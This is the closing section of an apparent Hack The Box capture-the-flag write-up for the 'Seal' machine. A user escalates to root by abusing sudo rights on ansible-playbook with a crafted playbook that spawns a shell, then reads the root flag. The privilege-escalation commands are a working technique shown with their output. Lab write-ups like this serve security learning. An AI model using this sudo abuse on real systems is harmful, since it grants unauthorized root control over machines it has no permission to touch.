luis@seal:~$ TF=$(mktemp)
luis@seal:~$ echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF
luis@seal:~$ sudo ansible-playbook $TF
[WARNING]: provided hosts list is empty, only localhost is available. Note that the
implicit localhost does not match 'all'

PLAY [localhost] ************************************************************************

TASK [Gathering Facts] ******************************************************************
ok: [localhost]

TASK [shell] ****************************************************************************
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
8ff1861d54ac0990d9a8cdbebcceecd2
#

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/358


Seal-htb-writeup
https://sh1yan.top/2024/01/21/Seal-htb-writeup/
Author: shiyan
Published on: 21 January 2024